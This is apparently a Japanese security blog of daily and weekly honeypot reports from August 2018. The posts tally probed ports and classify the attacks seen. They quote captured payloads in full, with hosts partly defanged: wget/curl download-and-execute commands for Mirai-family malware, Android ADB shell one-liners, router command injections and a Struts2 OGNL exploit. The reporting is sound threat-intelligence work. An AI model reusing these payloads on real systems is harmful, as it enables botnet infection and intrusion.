ハニーポット簡易分析(14,15日目:8/21,22)
今回は二日分まとめての更新となります。
8月21日
検知数 6,679 件
<0Byte以上の宛先ポート TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,587 | 42.15% | 調査行為 |
503 | intrinsa | 254 | 6.75% | 調査行為 |
3389 | RDP | 76 | 2.02% | 調査行為 |
1433 | Microsoft SQL Server | 75 | 1.99% | 調査行為 |
52869 | D-Link, Realtek SDK | 46 | 1.22% | マルウェアダウンロード |
8080 | PROXY | 43 | 1.14% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 40 | 1.06% | /conf へのアクセス |
8089 | ? | 34 | 0.90% | 調査行為 |
4369 | ? | 33 | 0.88% | 調査行為 |
83 | MIT ML Device | 33 | 0.88% | 調査行為 |
8月22日
検知数 6,734 件
<0Byte以上の宛先ポート TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,493 | 35.31% | 調査行為 |
22 | SSH | 457 | 10.81% | 調査行為 |
1433 | Microsoft SQL Server | 99 | 2.34% | 調査行為 |
8080 | PROXY | 57 | 1.35% | 調査行為 |
3389 | RDP | 51 | 1.21% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 50 | 1.18% | /conf へのアクセス |
8081 | D-Link | 46 | 1.09% | マルウェアダウンロード |
81 | ? | 34 | 0.80% | 調査行為 |
3790 | quickbooksrds | 33 | 0.78% | 調査行為 |
21 | FTP | 32 | 0.76% | 調査行為 |
503ポートへのアクセスが増加しましたが、攻撃と思われるコードはないため、調査行為止まりの通信でした。
<マルウェアダウンロード>
①
POST /HNAP1/ HTTP/1[.]0
・wget hxxp://176[.]32[.]32[.]156/bin
・wget hxxp://50[.]115[.]166[.]136/bin
→Mirai系マルウェア
②
POST /ctrlt/DeviceUpgrade_1 HTTP/1[.]1
・wget -g 209[.]141[.]33[.]86
・wget hxxp://80[.]211[.]112[.]95/sensi[.]sh
→Mirai系マルウェア
③
POST /picsdesc[.]xml HTTP/1[.]1
・wget hxxp://80[.]211[.]67[.]245/mips
・wget hxxp://159[.]65[.]232[.]56/xd[.]mips
・wget hxxp://80[.]211[.]112[.]150/mips
・wget hxxp://107[.]191[.]99[.]41/elf[.]mips
・wget hxxp://142[.]93[.]1[.]75/hoho[.]mips
・wget hxxp://209[.]97[.]143[.]112/bins/sora[.]mips
→Mirai系マルウェア
④
POST /wanipcn[.]xml HTTP/1[.]1
・wget hxxp://80[.]211[.]112[.]150/mips
→Mirai系マルウェア
⑤
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1[.]1
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/xb;sh%20/tmp/xb%27$ HTTP/1[.]1
→Mirai系マルウェアと推測
⑥
・shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp://185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2[.]
・shell:cd /data/local/tmp/; busybox wget hxxp://27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs[.]
→リンク先ダウンロード不可
マルウェアの傾向も変わっておらず、基本的にはMirai系のマルウェアとなります。
以上、簡易分析となります。
ハニーポット簡易分析(13日目:8/20)
ちょっと、前の解析となりますが、8月20日の解析結果となります。今日は頑張って、昨日分まで出来ればと思っています。
マルウェアも一部ダウンロード可能なものがあったため、時間があるときにできるとことまで、解析出来ればと思っています。
Honeytrap(2018/8/20)
検知数:6750件(0byte以上 3623件)
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,695 | 46.78% | 調査行為 |
3389 | RDP | 465 | 12.84% | 調査行為 |
1433 | Microsoft SQL Server | 71 | 1.96% | 調査行為 |
52869 | D-Link, Realtek SDK | 61 | 1.68% | マルウェアダウンロード |
22 | SSH | 53 | 1.46% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 44 | 1.21% | /conf へのアクセス |
8087 | ? | 33 | 0.91% | 調査行為 |
5094 | ? | 32 | 0.88% | 調査行為 |
161 | SNMP | 32 | 0.88% | 調査行為 |
32764 | ? | 32 | 0.88% |
調査行為 |
宛先ポートの傾向に大きな変化はありませんでした。マルウェアダウンロードについては一部のURLが調査時点では生きている状態でした。
<マルウェアダウンロード>
ポート:52869
→Mirai関連のマルウェア
POST /picsdesc.xml HTTP/1.1
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107[.]191[.]99[.]41/elf.mips
・wget hxxp://80[.]211[.]112[.]150/mips
・wget hxxp://142[.]93[.]1[.]75/hoho.mips
ポート:5555
→VTに登録なし
・shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs.
ポート:8081
→Mirai関連のマルウェア
POST /HNAP1/ HTTP/1.0
・wget hxxp://50[.]115[.]166[.]136/bin
ポート:37215
→Mirai関連のマルウェア
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・wget 209[.]141[.]33[.]86
・wget hxxp://80[.]211[.]112[.]95/sensi.sh
以上、簡易分析となります。
ハニーポット簡易分析(12日目:8/19)
週次分析のように詳細ではなく、個人メモ的な簡易分析になってきました。
何か変化があるかなーと思いつつ、簡易分析してみます。
Honeytrap 分析結果
8/19 7033件( 0Byte以上 4625件)
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,445 | 31.24% | 調査行為 |
3389 | RDP | 640 | 13.84% | 調査行為 |
22 | SSH | 274 | 5.92% | 調査行為 |
1433 | Microsoft SQL Server | 56 | 1.21% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 47 | 1.02% | /conf へのアクセス |
52869 | D-Link, Realtek SDK | 43 | 0.93% | マルウェアダウンロード |
8080 | PROXY | 43 | 0.93% | 調査行為 |
88 | Kerberos | 35 | 0.76% | 調査行為 |
2123 | ? | 34 | 0.74% | 調査行為 |
3388 | RDP | 23 | 0.50% | 調査行為 |
特に大きく変化した宛先ポートはありませんでした。
<マルウェアダウンロード>
① CVE-2014-8361の脆弱性を狙った攻撃
→ Mirai系のマルウェア
POST /picsdesc.xml HTTP/1.1
・wget hxxp://159[.]5[.]232[.]56/xd.mips
・wget hxxp://107[.]191[.]99[.]41/elf.mips
・wget hxxp://80[.]211[.]67[.]245/mips
②Huawei Router HG532の脆弱性を狙った攻撃
→ダウンロード不可。一度アクセスすると拒否されることもあることからマルウェアのダウンロードではなく、成功したIPを収集しているだけの可能性もあると推測
POST /ctrlt/DeviceUpgrade_1
・wget 209[.]141[.]33[.]86
・wget 209[.]141[.]42[.]3
③CVE-2014-8361の脆弱性を狙った攻撃
→ Mirai系のマルウェア
POST /wanipcn.xml HTTP/1.1
・wget hxxp://80[.]211[.]67[.]245/mips
こちらも大きな変化なしです。以上、簡易分析となります。
ハニーポット週次分析(8/11 - 8/17)〜ハニーポット、まとめてみました〜
約1週間程度のログが溜まったので、1週間でどのぐらいの情報が集められたかをまとめてみました。 普段からハニーポットを持っている人は自宅のハニーポットの比較、ハニーポットを初めたいと思っている人はどんな情報を集められるか知ってもらえればいいなーと思って、この記事を書きました。
現在、運用しているのは WoWHoneypotとHoneytrapで、解析基盤には Splunkを利用しています。Splunkはある程度自動的にログを正規化してくれるので、GUIで分析したい人には結構おすすめです。分析方法はまだまだ模索段階なので、ある程度まとまったら記事にして共有したいと思います。
マルウェアの分析もしたいと思いますが、ダウンロード不可になっているものも多く、ある程度リアルタイムで見ていないと、分析は厳しいかもしれません。今回検知したURLもダウンロード出来ないものが多数でした。単純にマルウェアを捕獲したいと考えている人は ハニーポットのCowrieで擬似的に攻撃者を侵入させ、ファイルをローカルにダウンロードさせる方が収集できると思います。
それでは、2018/8/11 - 8/17 の分析結果は以下となります。
Honeytrap
1.検知傾向
宛先ポート別の円グラフ (左:データサイズ 0byte 右:データサイズ 1byte以上)
1日の平均検知数はおよそ7,500件であり、うちおよそ半分はポートが空いているかの調査行為でした。データサイズの有無に関わらずに検知数が多かったポートは 445ポートとなります。ペイロードの全てを見ていないので断定することは出来ないですが、EternalBlue 実行のための調査行為もしくは EternalBlue による攻撃行為ではないか推測します。実際に、セキュリティベンダーのレポートからも EternalBlue による被害が多数確認されているとの報告もあります[1]。ハニーポットでこれだけ検知していることを考えるとまだまだ攻撃に利用されていると思いますので、 外部にポート 445 を公開しないよう注意が必要だと判断します(そもそも、この記事を読んでいる人でポート445の危険性を分かっていない人はいないと思いますが。。。)
次にデータサイズが1byte以上で普段は見ないポートとして、52869ポートの検知が多くあります。このポートで検知していた攻撃は CVE-2014-8361 の脆弱性を狙った攻撃です[2]。対象製品はD-Link xxx シリーズおよびRealtek SDK(いずれもルータ)であり、今流行りのIoTボットへの感染を狙ったものです。
<マルウェアダウンロード>
ポート 37215
① Huawei HG532 の脆弱性を狙った攻撃(CVE-2017-17215)
→ アクセス先からマルウェアのダウンロード不可であり、特定は出来ませんでしたが、おそらくMirai関連のマルウェアと思われます。
POST /ctrlt/DeviceUpgrade_1 http/1.1
Content-Length: 430
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm -rf /tmp/*; /bin/busybox wget -g xxx[.]xx[.]xx[.]xxx -l /tmp/o20Xz -r /huawei; /bin/busybox chmod 777 * /tmp/o20Xz; /tmp/o20Xz huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
ポート 52869
① Huawei HG532 の脆弱性を狙った攻撃(CVE-2017-17215)
→ アクセス先からマルウェアのダウンロード不可であり、特定は出来ませんでしたが、おそらくMirai関連のマルウェアと思われます。
POST /ctrlt/DeviceUpgrade_1 http/1.1
Content-Length: 430
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", resPOST /picsdesc.xml http/1.1
Content-Length: 630
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: Hello-World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var/; wget hxxp://xxx.xx.xx.xx/mips -O bt; chmod +x bt; ./bt mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
②D-Link xxx シリーズおよびRealtek SDKの脆弱性を狙った攻撃(CVE-2014-8361)
→Mirai関連のマルウェアとなります。
POST /picsdesc.xml http/1.1
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: Hello-World
<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var/; wget hxxp://xxx.xxx.xx.xx/mips -O am; chmod +x am; ./am mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
ポート 8080:
① D-Link の脆弱性 を狙った攻撃
→Mirai亜種LMAO/2.0 のダウンロードを狙った攻撃を思われます。
GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xxx.xxx.xx.xx/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ http/1.1
User-Agent: LMAO/2.0
ポート 5555:
Android Debug Bridge (ADB) の脆弱性を狙った攻撃
→IoTボットへの感染を狙った攻撃と思われます。
shell:cd /data/local/tmp;wget hxxp://xxx.xxx.xx.xxx/br -O- >br;sh br;busybox wget hxxp://xxx.xxx.xx.xxx/r -O- >r;sh r;curl hxxp://xxx.xxx.xx.xxx/c >c;sh c;busybox curl hxxp://xxx.xxx.xx.xxx/bc >bc;sh bc;rm -rf bc br r c;.
WoWHoneypot
1.検知傾向
WoWHoneypotは1日平均70件の検知でした。8/12はスキャンツールを回されたために増加した件数となっています。検知したパスおよびクエリのTOP10は以下となっています。
<検知したパスおよびクエリのTOP10>
パスおよびクエリ | 検知数 | 概要 |
/ | 43 | indexファイルへのアクセス |
/index.action | 13 | CVE-2017-5638 の脆弱性を狙った攻撃 |
/manager/html | 10 | Tomcat管理ページに対する調査行為 |
/MyAdmin/scripts/setup.php | 5 | PHPMyAdminが存在するかの調査行為 |
/phpMyAdmin/scripts/setup.php | 4 | PHPMyAdminが存在するかの調査行為 |
/qq.php | 4 | PHPのdie関数が実行できるかの調査行為 |
/phpMyAdmin/index.php | 3 | PHPMyAdminが存在するかの調査行為 |
/PMA/index.php | 2 | PHPMyAdminが存在するかの調査行為 |
/admin/PMA/index.php | 2 | PHPMyAdminが存在するかの調査行為 |
/admin/phpMyAdmin/index.php | 2 | PHPMyAdminが存在するかの調査行為 |
検知した大半が調査行為であり、実際に攻撃を仕掛けているものは少数でした。その中でも、2017年のApache Struts2の脆弱性を狙ったものを多く検知していました。PoCコードが公開されているおよび任意のコードが実行可能であることから、未だに検知し続けていると推測します。
今回、検知したものの中で任意のコード実行を狙っていた攻撃は以下となっています。
①Apache Struts2 の脆弱性(CVE-2017-5638) の脆弱性を狙った攻撃
→ マルウェアのダウンロードはうまく出来なかったため、脆弱性があるかの調査行為。もしくはリンク切れが想定されます。前から検知している攻撃手法で流れは以下となります。
1. iptableやSuSEfirewall2を停止
2.マルウェアをダウンロード
GET /index.action HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):*1.(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hxxp://xxx.xxxxx.xxx:xxxxxx/linux;chmod 777 linux;./linux;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
②D-Linkの脆弱性を狙った攻撃
→いずれも Mirai系のマルウェアであり、User-Agentに特徴があります。
例:LMAOやHakai など
GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xxx.xxx.xx.xx/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$ HTTP/1.1
User-Agent: Hello, World
GET /login.cgi?cli=aa%20aa%27;wget%20http://xxx.xxx.xx.xx/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1
User-Agent: LMAO/2.0
GET /login.cgi?cli=aa%20aa%27;wget%20http://xx.xxx.xxx.xx/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1
User-Agent: Hakai/2.0
今回は初回であることもあり、気合いを入れて作成してみました。
分析は以上となります。マルウェアの詳細な解析などは時間があるときに実施しようと思っており、月次レポート作成時に報告出来ればと思っています。
<参考>
[1] サイバー救急センターレポート 第4号 PDF版
https://www.lac.co.jp/lacwatch/pdf/20180815_cecreport_vol4.pdf
[2]Realtek SDK - Miniigd UPnP SOAP Command Execution (Metasploit)
https://www.exploit-db.com/exploits/37169/
<検知したWoWHoneypotのパスおよびクエリ一覧>
パスおよびクエリ | 検知数 |
/ | 43 |
/index.action | 13 |
/manager/html | 10 |
/MyAdmin/scripts/setup.php | 5 |
/phpMyAdmin/scripts/setup.php | 4 |
/qq.php | 4 |
/login.cgi?cli=aa%20aa%27;wget%20hxxp://xxx.xxx.xx.xx/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$ | 4 |
/phpMyAdmin/index.php | 3 |
/PMA/index.php | 2 |
/admin/PMA/index.php | 2 |
/admin/phpMyAdmin/index.php | 2 |
/cmd.php | 2 |
/cmx.php | 2 |
/log.php | 2 |
/phpMyAdmin/phpMyAdmin/index.php | 2 |
/pma/scripts/setup.php | 2 |
/pmd/index.php | 2 |
/test.php | 2 |
/phpStudy.php | 2 |
/q.php | 2 |
/qaq.php | 2 |
/xx.php | 2 |
/. | 1 |
/.well-known/security.txt | 1 |
/?XDEBUG_SESSION_START=phpstorm | 1 |
/HNAP1 | 1 |
/HNAP1/ | 1 |
/Nmap/folder/check1534083716 | 1 |
/NmapUpperCheck1534083716 | 1 |
/_query.php | 1 |
/admin/assets/js/views/login.js | 1 |
/admin/index.php | 1 |
/admin/mysql/index.php | 1 |
/admin/mysql2/index.php | 1 |
/admin/phpmyadmin2/index.php | 1 |
/appserv.php | 1 |
/ccvv | 1 |
/claroline/phpMyAdmin/index.php | 1 |
/cmdd.php | 1 |
/cmv.php | 1 |
/currentsetting.htm | 1 |
/db/index.php | 1 |
/db/scripts/setup.php | 1 |
/dbadmin/index.php | 1 |
/desktop.ini.php | 1 |
/device_description.xml | 1 |
/evox/about | 1 |
/favicon.ico | 1 |
/hell.php | 1 |
/help-e.php | 1 |
/index.php | 1 |
/java.php | 1 |
/knal.php | 1 |
/lala-dpr.php | 1 |
/lala.php | 1 |
/logon.php | 1 |
/lol.php | 1 |
/muhstik-dpr.php | 1 |
/muhstik.php | 1 |
/muhstik2.php | 1 |
/muhstiks.php | 1 |
/myadmin/index.php | 1 |
/myadmin2/index.php | 1 |
/mysql-admin/index.php | 1 |
/mysql/index.php | 1 |
/mysql/scripts/setup.php | 1 |
/mysqladmin/index.php | 1 |
/mysqladmin/scripts/setup.php | 1 |
/nmaplowercheck1534083716 | 1 |
/phpMyAdmin.old/index.php | 1 |
/phpMyAdminold/index.php | 1 |
/phpMyadmin_bak/index.php | 1 |
/phpadmin/index.php | 1 |
/phpma/index.php | 1 |
/phpmyadmin-old/index.php | 1 |
/phpmyadmin0/index.php | 1 |
/phpmyadmin1/index.php | 1 |
/phpmyadmin2/index.php | 1 |
/pma-old/index.php | 1 |
/pmamy/index.php | 1 |
/pmamy2/index.php | 1 |
/pmd_online.php | 1 |
/qnfxcjqr | 1 |
/robots.txt | 1 |
/scripts/setup.php | 1 |
/setup.php | 1 |
/shell.php | 1 |
/sitemap.xml | 1 |
/sqladmin/scripts/setup.php | 1 |
/text.php | 1 |
/tools/phpMyAdmin/index.php | 1 |
/typo3/phpmyadmin/index.php | 1 |
/uploader.php | 1 |
/w00tw00t.at.blackhats.romanian.anti-sec:) | 1 |
/web/phpMyAdmin/index.php | 1 |
/webdav/ | 1 |
/winbox.png | 1 |
/wp-config.php | 1 |
/www/phpMyAdmin/index.php | 1 |
/x | 1 |
/xampp/phpmyadmin/index.php | 1 |
/xmlrpc.php | 1 |
/z.php | 1 |
/phpmyadmin/%20index.php | 1 |
/pmd/%20index.php | 1 |
hxxp://xxx.xxx.xxx.xx/check_proxy | 1 |
/ipc$ | 1 |
/12.php | 1 |
/1213.php | 1 |
/3.php | 1 |
/56.php | 1 |
/9678.php | 1 |
/ak.php | 1 |
/ak47.php | 1 |
/ak48.php | 1 |
/angge.php | 1 |
/aotu.php | 1 |
/aw.php | 1 |
/bak.php | 1 |
/cainiao.php | 1 |
/conflg.php | 1 |
/data.php | 1 |
/db.init.php | 1 |
/db__.init.php | 1 |
/db_dataml.php | 1 |
/db_desql.php | 1 |
/db_session.init.php | 1 |
/defect.php | 1 |
/fack.php | 1 |
/feixiang.php | 1 |
/h1.php | 1 |
/hh.php | 1 |
/hm.php | 1 |
/images.php | 1 |
/infoo.php | 1 |
/ip.php | 1 |
/l7.php | 1 |
/l8.php | 1 |
/lindex.php | 1 |
/m.php?pbid=open | 1 |
/min.php | 1 |
/mx.php | 1 |
/mz.php | 1 |
/pe.php | 1 |
/phpinfi.php | 1 |
/post.php | 1 |
/qwe.php | 1 |
/s.php | 1 |
/sdk | 1 |
/sheep.php | 1 |
/ssaa.php | 1 |
/system.php | 1 |
/w.php | 1 |
/wan.php | 1 |
/wanan.php | 1 |
/wc.php | 1 |
/webslee.php | 1 |
/weixiao.php | 1 |
/wp-admins.php | 1 |
/wshell.php | 1 |
/wuwu11.php | 1 |
/xiao.php | 1 |
/xiaoma.php | 1 |
/xiaomae.php | 1 |
/xiaomar.php | 1 |
/xshell.php | 1 |
/xw.php | 1 |
/xw1.php | 1 |
/yao.php | 1 |
/yumo.php | 1 |
/zuo.php | 1 |
/zuoshou.php | 1 |
*1:#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class
ハニーポット簡易分析(11日目:8/18)
いつもと内容がほぼ変わらないですが、8/18(11日目)の分析結果となります。
Honeytrap
検知数: 7247件(0byte 以上 4796件)
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
1433 | Microsoft SQL Server | 2,153 | 44.89% | 調査行為 |
445 | SMB | 1,512 | 31.53% | 調査行為 |
22222 | SSH | 64 | 1.33% | 調査行為 |
3389 | RDP | 47 | 0.98% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 45 | 0.94% | /conf へのアクセス |
8080 | PROXY | 43 | 0.90% | 調査行為 |
52869 | D-Link, Realtek SDK | 42 | 0.88% | マルウェアダウンロード |
119 | NNTP | 32 | 0.67% | 調査行為 |
515 | ? | 32 | 0.67% | 調査行為 |
9943 | ? | 32 | 0.67% | 調査行為 |
ポート 1433宛への通信が増加しましたが、通信内容については特に変化はありませんでした。他に特徴的な通信もありませんでした。
<マルウェアダウンロード>
ポート:52869
POST /picsdesc.xml HTTP/1.1
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107[.]191[.]99[.]41/elf.mips
ポート:5555
shell:cd /data/local/tmp;wget hxxp://207.148.78.152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;.
ポート:37215
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
/bin/busybox wget -g 209[.]141[.]33[.]86 -l /tmp/soVxo -r /x
断定は出来ないですが、いずれもIoTを狙ってたものだと思われます。
今回の分析結果は以上となります。
ハニーポット分析(9,10日目:8/16,8/17)
今回は、2日分をまとめて分析しています。1週間分のログも溜まってたので、休み中に頑張って、週次レポート的なものは作りたいと思います。
Honeytrap分析
8月16日(木)
検知数:7044件(ペイロード有:2905件)
<宛先ポート別 TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,535 | 52.84% | 調査行為 |
3389 | RDP | 155 | 5.34% | 調査行為 |
81 | HTTP | 136 | 4.68% | 調査行為 |
52869 | D-Link, Realtek SDK | 49 | 1.69% | マルウェアダウンロード |
1433 | Microsoft SQL Server | 48 | 1.65% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 47 | 1.62% | /conf へのアクセス |
8080 | PROXY | 46 | 1.58% | 調査行為 |
5555 | Android Debug Bridge (ADB) | 42 | 1.45% | マルウェアダウンロード |
465 | SMTPS | 34 | 1.17% | 調査行為 |
5901 | VNC | 33 | 1.14% |
調査行為 |
8月17日(金)
検知数:5697件(ペイロード有:2895 件)
<宛先ポート別 TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,496 | 51.68% | 調査行為 |
3389 | RDP | 72 | 2.49% | 調査行為 |
2222 | SSH | 63 | 2.18% | 調査行為 |
1962 | ? | 63 | 2.18% | 調査行為 |
1433 | Microsoft SQL Server | 55 | 1.90% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 44 | 1.52% | /conf へのアクセス |
8080 | PROXY | 36 | 1.24% | 調査行為 |
52869 | D-Link, Realtek SDK | 35 | 1.21% | マルウェアダウンロード |
175 | VMNET | 33 | 1.14% | 調査行為 |
5357 | Web Services on Devices | 33 | 1.14% | 調査行為 |
<マルウェアダウンロード>
いずれもIoTを狙ったものと思われます。
ポート:52869
ペイロード:
POST /picsdesc.xml
・cd /tmp/;wget hxxp://107[.]191[.]99[.]41/elf[.]mips -O elf
・cd /var/; wget hxxp://80[.]211[.]67[.]245/mips -O am; chmod +x am; [.]/am mips
・cd /tmp/;wget hxxp://159[.]65[.]232[.]56/xd[.]mips
・cd /tmp/;wget hxxp://167[.]99[.]196[.]170/xd[.]mips
ポート:5555
ペイロード:
・sshell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp://185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2
日次の分析では、マルウェアの分析と急増したポートに関しての考察をしていこうかなと思っています。結構細かく見ようとすると大変なので。。。。。
以上、ハニーポットの分析でした。
ハニーポット分析(8日目:8/15)
8日目(8/15)のハニーポット分析結果です。
Honeypot検知数:
9,394 件 (内、ペイロード有 4,321 件)
<宛先ポート別検知数 TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,686 | 39.02% | 調査行為 |
3389 | RDP | 1,176 | 27.22% | 調査行為 |
22 | SSH | 62 | 1.44% | 調査行為 |
1433 | Microsoft SQL Server | 58 | 1.34% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 47 | 1.09% | 調査行為 |
443 | HTTPS | 46 | 1.06% | 暗号化 |
52869 | D-Link, Realtek SDK | 39 | 0.90% | マルウェアダウンロード |
5555 | Android Debug Bridge (ADB) | 37 | 0.86% | マルウェアダウンロード |
8080 | PROXY | 37 | 0.86% | 調査行為 |
6379 | Redis | 35 | 0.81% | 調査行為 |
<ペイロード例>
445ポート:
PC NETWORK PROGRAM 1.0LANMAN1.0Windows for Workgroups 3.1aLM1.2X002LANMAN2.1NT LM 0.12
3389ポート:
Cookie: mstshash=hello
22ポート:
SSH-2.0-libssh2_1.4.3
1433ポート:
SERVERsaOSQL-32160.16.145.183ODBC
8088ポート:
GET /conf
52869ポート:
POST /picsdesc[.]xml hxxp/1[.]1
コマンド一覧
cd /tmp/;wget hxxp[:]//107[.]191[.]99[.]41/elf[.]mips -O elf
cd /tmp/;wget hxxp[:]//178[.]128[.]145[.]32/sora[.]mips -O sora
cd /tmp/;wget hxxp[:]//80[.]211[.]53[.]179/bins/gemini[.]mips
cd /var/; wget hxxp[:]//198[.]12[.]97[.]81/mips -O bt; chmod +x bt; [.]/bt mips
cd /var/; wget hxxp[:]//212[.]237[.]32[.]62/mips -O am; chmod +x am; [.]/am mips
→ IoT を狙ったマルウェア(Mirai系)
5555ポート:
